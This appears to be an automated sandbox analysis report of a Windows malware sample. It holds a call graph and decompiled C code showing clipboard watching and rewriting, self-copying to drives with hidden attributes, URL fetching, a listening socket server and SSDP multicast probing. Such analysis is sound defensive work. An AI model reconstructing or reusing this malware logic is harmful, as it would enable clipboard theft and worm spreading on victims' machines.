5568->5571 5569 40526b 5570->5571 5596 404cf0 _chkstk 5571->5596 5575 405a7f Sleep 5574->5575 5579 405a96 5575->5579 5576 405b16 Sleep 5576->5575 5577 405aae Sleep wsprintfA 5649 40d160 InternetOpenA 5577->5649 5579->5576 5579->5577 5580 40d210 60 API calls 5579->5580 5580->5579 5582 40cee8 5581->5582 5583 40cecf GetFileSize FindCloseChangeNotification 5581->5583 5582->5563 5583->5582 5589 404a0d 5584->5589 5585 404a86 5585->5563 5586 404a1c RegOpenKeyExW 5587 404a3e RegQueryValueExW 5586->5587 5586->5589 5588 404a7a RegCloseKey 5587->5588 5587->5589 5588->5589 5589->5585 5589->5586 5589->5588 5591 4049d9 5590->5591 5592 40499c 5590->5592 5591->5568 5591->5569 5631 404900 GetDriveTypeW 5592->5631 5595 4049cb lstrcpyW 5595->5591 5597 404d0e 6 API calls 5596->5597 5611 404d07 5596->5611 5598 404dc2 5597->5598 5599 404e04 PathFileExistsW 5597->5599 5600 40cea0 3 API calls 5598->5600 5601 404e80 PathFileExistsW 5599->5601 5602 404e15 PathFileExistsW 5599->5602 5603 404dce 5600->5603 5606 404e91 5601->5606 5607 404ed6 FindFirstFileW 5601->5607 5604 404e26 CreateDirectoryW 5602->5604 5605 404e48 PathFileExistsW 5602->5605 5603->5599 5610 404de5 SetFileAttributesW DeleteFileW 5603->5610 5604->5605 5612 404e39 SetFileAttributesW 5604->5612 5605->5601 5613 404e59 CopyFileW 5605->5613 5608 404eb1 5606->5608 5609 404e99 5606->5609 5607->5611 5629 404efd 5607->5629 5615 404aa0 3 API calls 5608->5615 5636 404aa0 CoInitialize CoCreateInstance 5609->5636 5610->5599 5611->5569 5612->5605 5613->5601 5617 404e71 SetFileAttributesW 5613->5617 5618 404eac SetFileAttributesW 5615->5618 5616 404fbf lstrcmpW 5619 404fd5 lstrcmpW 5616->5619 5616->5629 5617->5601 5618->5607 5619->5629 5621 405196 FindNextFileW 5621->5616 5622 4051b2 FindClose 5621->5622 5622->5611 5623 40501b lstrcmpiW 5623->5629 5624 405082 PathMatchSpecW 5625 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5624->5625 5624->5629 5625->5629 5626 405100 PathFileExistsW 5627 405116 wsprintfW wsprintfW 5626->5627 5626->5629 5628 405180 MoveFileExW 5627->5628 5627->5629 5628->5621 5629->5616 5629->5621 5629->5623 5629->5624 5629->5626 5640 404bb0 CreateDirectoryW wsprintfW FindFirstFileW 5629->5640 5632 40493a 5631->5632 5633 404928 5631->5633 5632->5591 5632->5595 5633->5632 5634 40493c QueryDosDeviceW 5633->5634 5634->5632 5635 404956 StrCmpNW 5634->5635 5635->5632 5637 404ad6 5636->5637 5639 404b12 5636->5639 5638 404ae0 wsprintfW 5637->5638 5637->5639 5638->5639 5639->5618 5641 404c05 lstrcmpW 5640->5641 5642 404cdf 5640->5642 5643 404c1b lstrcmpW 5641->5643 5647 404c31 5641->5647 5642->5629 5644 404c33 wsprintfW wsprintfW 5643->5644 5643->5647 5646 404c96 MoveFileExW 5644->5646 5644->5647 5645 404cac FindNextFileW 5645->5641 5648 404cc8 FindClose RemoveDirectoryW 5645->5648 5646->5645 5647->5645 5648->5642 5650 40d186 InternetOpenUrlA 5649->5650 5651 40d1f8 Sleep 5649->5651 5652 40d1a5 HttpQueryInfoA 5650->5652 5653 40d1ee InternetCloseHandle 5650->5653 5651->5579 5654 40d1e4 InternetCloseHandle 5652->5654 5655 40d1ce 5652->5655 5653->5651 5654->5653 5655->5654 5740 40b580 5745 409610 5740->5745 5743 40b5aa 5744 40b420 312 API calls 5744->5743 5746 409490 2 API calls 5745->5746 5747 40961f 5746->5747 5748 409629 5747->5748 5749 40962d EnterCriticalSection 5747->5749 5748->5743 5748->5744 5750 40964c LeaveCriticalSection 5749->5750 5750->5748 5844 40bbe0 5845 409f30 312 API calls 5844->5845 5846 40bc18 5845->5846 5847 40c461 5849 40c46a 5847->5849 5848 40c55d 5849->5848 5850 40c4d3 lstrcmpiW 5849->5850 5851 40c553 SysFreeString 5850->5851 5852 40c4e6 5850->5852 5851->5848 5853 40bf20 2 API calls 5852->5853 5855 40c4f4 5853->5855 5854 40c545 5854->5851 5855->5851 5855->5854 5856 40c523 lstrcmpiW 5855->5856 5857 40c535 5856->5857 5858 40c53b SysFreeString 5856->5858 5857->5858 5858->5854 5764 405045 5767 404feb 5764->5767 5765 40501b lstrcmpiW 5765->5767 5766 405196 FindNextFileW 5768 4051b2 FindClose 5766->5768 5769 404fbf lstrcmpW 5766->5769 5767->5765 5767->5766 5770 405082 PathMatchSpecW 5767->5770 5772 405100 PathFileExistsW 5767->5772 5777 404bb0 11 API calls 5767->5777 5774 4051bf 5768->5774 5769->5767 5773 404fd5 lstrcmpW 5769->5773 5770->5767 5771 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5770->5771 5771->5767 5772->5767 5775 405116 wsprintfW wsprintfW 5772->5775 5773->5767 5775->5767 5776 405180 MoveFileExW 5775->5776 5776->5766 5777->5767 5778 404685 5779 4045fe 5778->5779 5780 40468a LeaveCriticalSection 5779->5780 5781 408a00 8 API calls 5779->5781 5782 40465c 5781->5782 5782->5780 5859 405226 5862 405208 5859->5862 5860 405348 Sleep 5860->5862 5861 405239 5863 404980 4 API calls 5861->5863 5862->5860 5862->5861 5864 405358 ExitThread 5862->5864 5865 4049e0 4 API calls 5862->5865 5867 40524a 5863->5867 5865->5862 5866 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5869 4052e6 wsprintfW 5866->5869 5870 4052fb wsprintfW 5866->5870 5867->5866 5868 40526b 5867->5868 5869->5870 5871 404cf0 49 API calls 5870->5871 5871->5868 5872 405b26 ExitThread 5783 40ea08 5784 40ea10 5783->5784 5786 40eac4 5784->5786 5789 40ec4d 5784->5789 5788 40ea49 5788->5786 5793 40eb38 RtlUnwind 5788->5793 5790 40ec62 5789->5790 5792 40ec7e 5789->5792 5791 40eced NtQueryVirtualMemory 5790->5791 5790->5792 5791->5792 5792->5788 5794 40eb50 5793->5794 5794->5788 5887 408a6e 5888 408990 _invalid_parameter 3 API calls 5887->5888 5891 408a2d 5888->5891 5889 408a42 5890 408840 _invalid_parameter 7 API calls 5890->5891 5891->5889 5891->5890 5892 408a44 memcpy 5891->5892 5892->5891 5656 403ed0 GetWindowLongW 5657 403ef4 5656->5657 5658 403f16 5656->5658 5659 403f01 5657->5659 5660 403f87 IsClipboardFormatAvailable 5657->5660 5661 403f11 5658->5661 5667 403f66 5658->5667 5668 403f4e SetWindowLongW 5658->5668 5664 403f24 SetClipboardViewer SetWindowLongW 5659->5664 5665 403f07 5659->5665 5662 403fa3 IsClipboardFormatAvailable 5660->5662 5663 403f9a 5660->5663 5666 404104 DefWindowProcA 5661->5666 5662->5663 5669 403fb8 IsClipboardFormatAvailable 5662->5669 5672 403fd5 OpenClipboard 5663->5672 5673 40409f 5663->5673 5664->5666 5665->5661 5670 4040bd RegisterRawInputDevices ChangeClipboardChain 5665->5670 5667->5661 5671 403f6c SendMessageA 5667->5671 5668->5661 5669->5663 5670->5666 5671->5661 5672->5673 5674 403fe5 GetClipboardData 5672->5674 5673->5661 5675 4040a5 SendMessageA 5673->5675 5674->5661 5676 403ffd GlobalLock 5674->5676 5675->5661 5676->5661 5677 404015 5676->5677 5678 404028 5677->5678 5679 404049 5677->5679 5681 40405e 5678->5681 5682 40402e 5678->5682 5680 403ce0 13 API calls 5679->5680 5683 404034 GlobalUnlock CloseClipboard 5680->5683 5698 403e00 5681->5698 5682->5683 5692 403c20 5682->5692 5683->5673 5687 404087 5683->5687 5706 403480 lstrlenW 5687->5706 5690 408990 _invalid_parameter 3 API calls 5691 40409c 5690->5691 5691->5673 5693 403c2b 5692->5693 5694 403c31 lstrlenW 5693->5694 5695 403c44 5693->5695 5696 408840 _invalid_parameter 7 API calls 5693->5696 5697 403c61 lstrcpynW 5693->5697 5694->5693 5694->5695 5695->5683 5696->5693 5697->5693 5697->5695 5703 403e0d 5698->5703 5699 403e13 lstrlenA 5699->5703 5704 403e26 5699->5704 5700 403bc0 2 API calls 5700->5703 5701 408840 _invalid_parameter 7 API calls 5701->5703 5703->5699 5703->5700 5703->5701 5703->5704 5705 408990 _invalid_parameter 3 API calls 5703->5705 5735 403db0 5703->5735 5704->5683 5705->5703 5707 4034b0 5706->5707 5708 403698 StrStrW 5707->5708 5712 403628 5707->5712 5713 40363a 5707->5713 5709 4036c3 StrStrW 5708->5709 5708->5713 5711 4036eb StrStrW 5709->5711 5709->5713 5710 403756 StrStrW 5716 40376d 5710->5716 5717 403800 StrStrW 5710->5717 5711->5713 5712->5690 5713->5710 5713->5712 5714 4037c6 isalpha 5715 4037dd isdigit 5714->5715 5714->5716 5715->5712 5715->5716 5716->5712 5716->5714 5716->5717 5719 4039e7 5717->5719 5720 4039ee StrStrW 5717->5720 5719->5720 5721 403a01 StrStrW 5720->5721 5723 403a3f 5721->5723 5724 403aa2 StrStrW 5723->5724 5730 403ae9 lstrlenA 5723->5730 5725 403ab5 5724->5725 5726 403abc StrStrW 5724->5726 5725->5726 5727 403ad6 StrStrW 5726->5727 5728 403acf 5726->5728 5727->5730 5728->5727 5730->5712 5731 403b39 GlobalAlloc 5730->5731 5731->5712 5732 403b54 GlobalLock 5731->5732 5732->5712 5733 403b67 memcpy GlobalUnlock OpenClipboard 5732->5733 5733->5712 5734 403b94 EmptyClipboard SetClipboardData CloseClipboard 5733->5734 5734->5712 5736 403dbb 5735->5736 5737 403dc1 lstrlenA 5736->5737 5738 403bc0 2 API calls 5736->5738 5739 403df4 5736->5739 5737->5736 5738->5736 5739->5703 5795 40b610 5800 40e360 5795->5800 5797 40b625 5798 40e360 16 API calls 5797->5798 5799 40b643 5797->5799 5798->5799 5801 40e370 5800->5801 5804 40e43b 5800->5804 5802 408820 7 API calls 5801->5802 5801->5804 5803 40e398 5802->5803 5803->5804 5805 408a00 8 API calls 5803->5805 5804->5797 5806 40e3c4 5805->5806 5807 40e3e0 5806->5807 5808 40e3d1 5806->5808 5810 40e2e0 4 API calls 5807->5810 5809 408990 _invalid_parameter 3 API calls 5808->5809 5811 40e3d7 5809->5811 5812 40e3ed 5810->5812 5811->5797 5813 40e3f6 EnterCriticalSection 5812->5813 5814 40e42c 5812->5814 5815 40e419 LeaveCriticalSection 5813->5815 5816 40e40d 5813->5816 5817 408990 _invalid_parameter 3 API calls 5814->5817 5815->5797 5816->5815 5818 40e435 5817->5818 5819 408990 _invalid_parameter 3 API calls 5818->5819 5819->5804 5820 40ea10 5821 40ea2e 5820->5821 5823 40eac4 5820->5823 5822 40ec4d NtQueryVirtualMemory 5821->5822 5825 40ea49 5822->5825 5824 40eb38 RtlUnwind 5824->5825 5825->5823 5825->5824 5826 40dc10 5827 40dca0 5826->5827 5828 40dc27 5826->5828 5829 40dc37 5828->5829 5830 40dc55 EnterCriticalSection 5828->5830 5831 40dc8c LeaveCriticalSection DeleteCriticalSection 5830->5831 5833 40dc6d 5830->5833 5832 408990 _invalid_parameter 3 API calls 5831->5832 5832->5827 5834 408990 GetCurrentProcessId HeapValidate RtlFreeHeap _invalid_parameter 5833->5834 5835 40dc8b 5833->5835 5834->5833 5835->5831 5893 40b670 5894 40b687 5893->5894 5908 40b6de 5893->5908 5895 40b691 5894->5895 5896 40b6e3 5894->5896 5897 40b72d 5894->5897 5894->5908 5898 408820 7 API calls 5895->5898 5900 40b708 5896->5900 5901 40b6fb InterlockedDecrement 5896->5901 5919 40a2d0 5897->5919 5903 40b69e 5898->5903 5902 408990 _invalid_parameter 3 API calls 5900->5902 5901->5900 5904 40b714 5902->5904 5915 40ddc0 5903->5915 5906 408990 _invalid_parameter 3 API calls 5904->5906 5906->5908 5909 409610 4 API calls 5910 40b6bf 5909->5910 5910->5908 5911 40b6cb InterlockedIncrement 5910->5911 5911->5908 5912 409f30 312 API calls 5913 40b753 5912->5913 5913->5908 5913->5912 5924 40a3d0 5913->5924 5916 40ddc4 5915->5916 5917 40b6b0 5915->5917 5916->5917 5918 40ddd5 InterlockedIncrement 5916->5918 5917->5909 5918->5917 5920 40a2e3 5919->5920 5921 40a30d memcpy 5919->5921 5922 408880 9 API calls 5920->5922 5921->5913 5923 40a304 5922->5923 5923->5921 5925 40a3f9 5924->5925 5926 40a3ee 5924->5926 5925->5926 5927 40a411 memmove 5925->5927 5926->5913 5927->5926 5928 4045b0 5929 40454b 5928->5929 5930 408990 _invalid_parameter 3 API calls 5929->5930 5931 4045bb LeaveCriticalSection 5930->5931 5836 406359 5837 406362 5836->5837 5838 406371 34 API calls 5837->5838 5839 4071a6 5837->5839 5933 4047fc 5936 4046fc 5933->5936 5934 4047f3 5935 40481c 5934->5935 5939 404210 68 API calls 5934->5939 5937 408990 _invalid_parameter 3 API calls 5935->5937 5936->5934 5938 408990 _invalid_parameter 3 API calls 5936->5938 5940 40483d 5937->5940 5941 404752 5938->5941 5939->5935 5942 40484c CreateFileW 5940->5942 5943 4048de LeaveCriticalSection 5940->5943 5944 408a00 8 API calls 5941->5944 5942->5943 5945 40486f 5942->5945 5946 404762 5944->5946 5949 4048ca FlushFileBuffers CloseHandle 5945->5949 5950 40488c WriteFile 5945->5950 5947 408990 _invalid_parameter 3 API calls 5946->5947 5948 404789 5947->5948 5951 40a8a0 7 API calls 5948->5951 5949->5943 5950->5945 5952 4047c0 5951->5952 5953 4059c0 65 API calls 5952->5953 5953->5934 5840 40d79f 5841 40d760 5840->5841 5842 40d7cb memmove 5841->5842 5843 40d7de 5841->5843 5842->5841

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 265 40e820-40e832 call 408820 268 40e9a6-40e9aa 265->268 269 40e838-40e870 GetSystemInfo InitializeCriticalSection CreateEventA 265->269 270 40e876-40e889 CreateIoCompletionPort 269->270 271 40e99f-40e9a4 call 40de00 269->271 270->271 272 40e88f-40e899 call 40b810 270->272 271->268 272->271 277 40e89f-40e8b7 WSASocketA 272->277 277->271 278 40e8bd-40e920 setsockopt htons bind 277->278 278->271 279 40e926-40e938 listen 278->279 279->271 280 40e93a-40e945 WSACreateEvent 279->280 280->271 281 40e947-40e957 WSAEventSelect 280->281 281->271 282 40e959-40e95f 281->282 283 40e961-40e971 call 40b8c0 282->283 284 40e97f-40e98f call 40b8c0 282->284 287 40e976-40e97d 283->287 288 40e994-40e99e 284->288 287->283 287->284
                                                                                                                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                                                                                                                  			E0040E820(void* __esi) {
                                                                                                                                                                                                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                  				short _v40;
                                                                                                                                                                                                                                                                  				char _v77;
                                                                                                                                                                                                                                                                  				short _v82;
                                                                                                                                                                                                                                                                  				short _v86;
                                                                                                                                                                                                                                                                  				short _v90;
                                                                                                                                                                                                                                                                  				short _v92;
                                                                                                                                                                                                                                                                  				short _v94;
                                                                                                                                                                                                                                                                  				short _v96;
                                                                                                                                                                                                                                                                  				short _v98;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				short _t39;
                                                                                                                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				void* _t58;
                                                                                                                                                                                                                                                                  				void* _t59;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t30 = E00408820(0x4c);
                                                                                                                                                                                                                                                                  				_t54 = _t30;
                                                                                                                                                                                                                                                                  				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					 *_t54 = 0x494f4350; // executed
                                                                                                                                                                                                                                                                  					GetSystemInfo( &_v36); // executed
                                                                                                                                                                                                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                  					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                  					if(_t33 == 0) {
                                                                                                                                                                                                                                                                  						L12:
                                                                                                                                                                                                                                                                  						E0040DE00(_t54);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                  					if(_t36 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = E0040B810(_t45);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1); // executed
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v77 = 1;
                                                                                                                                                                                                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1); // executed
                                                                                                                                                                                                                                                                  					_v94 = 0;
                                                                                                                                                                                                                                                                  					_v90 = 0;
                                                                                                                                                                                                                                                                  					_v86 = 0;
                                                                                                                                                                                                                                                                  					_v82 = 0;
                                                                                                                                                                                                                                                                  					_t39 = _v40;
                                                                                                                                                                                                                                                                  					_v96 = 2;
                                                                                                                                                                                                                                                                  					_v92 = _t39;
                                                                                                                                                                                                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                  					_v98 = _t39;
                                                                                                                                                                                                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                  					__imp__#2(_t40,  &_v100, 0x10); // executed
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff); // executed
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                  					if(_t40 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8); // executed
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t56 = 0;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E750, _t54, 0, 0); // executed
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E120, _t54, 0, 0); // executed
                                                                                                                                                                                                                                                                  					return _t54;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}

























                                                                                                                                                                                                                                                                  0x0040e826
                                                                                                                                                                                                                                                                  0x0040e82b
                                                                                                                                                                                                                                                                  0x0040e82d
                                                                                                                                                                                                                                                                  0x0040e832
                                                                                                                                                                                                                                                                  0x0040e9aa
                                                                                                                                                                                                                                                                  0x0040e838
                                                                                                                                                                                                                                                                  0x0040e83d
                                                                                                                                                                                                                                                                  0x0040e843
                                                                                                                                                                                                                                                                  0x0040e849
                                                                                                                                                                                                                                                                  0x0040e84d
                                                                                                                                                                                                                                                                  0x0040e854
                                                                                                                                                                                                                                                                  0x0040e857
                                                                                                                                                                                                                                                                  0x0040e865
                                                                                                                                                                                                                                                                  0x0040e86b
                                                                                                                                                                                                                                                                  0x0040e870
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e9a4
                                                                                                                                                                                                                                                                  0x0040e87e
                                                                                                                                                                                                                                                                  0x0040e884
                                                                                                                                                                                                                                                                  0x0040e889
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e88f
                                                                                                                                                                                                                                                                  0x0040e894
                                                                                                                                                                                                                                                                  0x0040e899
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8ab
                                                                                                                                                                                                                                                                  0x0040e8b1
                                                                                                                                                                                                                                                                  0x0040e8b7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8cc
                                                                                                                                                                                                                                                                  0x0040e8d1
                                                                                                                                                                                                                                                                  0x0040e8dd
                                                                                                                                                                                                                                                                  0x0040e8e1
                                                                                                                                                                                                                                                                  0x0040e8e5
                                                                                                                                                                                                                                                                  0x0040e8e9
                                                                                                                                                                                                                                                                  0x0040e8ee
                                                                                                                                                                                                                                                                  0x0040e8f8
                                                                                                                                                                                                                                                                  0x0040e8fd
                                                                                                                                                                                                                                                                  0x0040e901
                                                                                                                                                                                                                                                                  0x0040e90d
                                                                                                                                                                                                                                                                  0x0040e912
                                                                                                                                                                                                                                                                  0x0040e917
                                                                                                                                                                                                                                                                  0x0040e920
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e92f
                                                                                                                                                                                                                                                                  0x0040e938
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e93a
                                                                                                                                                                                                                                                                  0x0040e940
                                                                                                                                                                                                                                                                  0x0040e945
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e94e
                                                                                                                                                                                                                                                                  0x0040e957
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e95a
                                                                                                                                                                                                                                                                  0x0040e95f
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e971
                                                                                                                                                                                                                                                                  0x0040e976
                                                                                                                                                                                                                                                                  0x0040e977
                                                                                                                                                                                                                                                                  0x0040e97a
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e98f
                                                                                                                                                                                                                                                                  0x0040e99e
                                                                                                                                                                                                                                                                  0x0040e99e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(?), ref: 0040E843
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040E857
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040E865
                                                                                                                                                                                                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040E87E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B810: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040B82E
                                                                                                                                                                                                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040E8AB
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E8D1
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040E901
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040E917
                                                                                                                                                                                                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040E92F
                                                                                                                                                                                                                                                                  • WSACreateEvent.WS2_32 ref: 0040E93A
                                                                                                                                                                                                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040E94E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: CreateThread.KERNELBASE ref: 0040B93F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89be79b3ec0105c2e49ed045d77e557050f91549f3e97c988e25887ceb6b91ee
                                                                                                                                                                                                                                                                  • Instruction ID: 90be5a7511d59d458e732dc8095ee9a9d8f3c027a684bd61592a782dd0d87169
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89be79b3ec0105c2e49ed045d77e557050f91549f3e97c988e25887ceb6b91ee
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 274191B4644702BBD2209F798C06F1AB7A4BF84710F108A3AF668E66D0E774E454C799
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 289 40c2a0-40c2c7 socket 290 40c401-40c405 289->290 291 40c2cd-40c395 htons inet_addr setsockopt call 409260 bind lstrlenA sendto ioctlsocket 289->291 292 40c407-40c40d 290->292 293 40c40f-40c415 290->293 296 40c39b-40c3a2 291->296 292->293 297 40c3a4-40c3b3 call 40c1b0 296->297 298 40c3f5-40c3f9 call 409320 296->298 302 40c3b8-40c3c0 297->302 301 40c3fe 298->301 301->290 303 40c3c2 302->303 304 40c3c4-40c3f3 call 408880 302->304 303->298 304->296
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                  • htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: connect.WS2_32(000000FF,?,00000010), ref: 004092C6
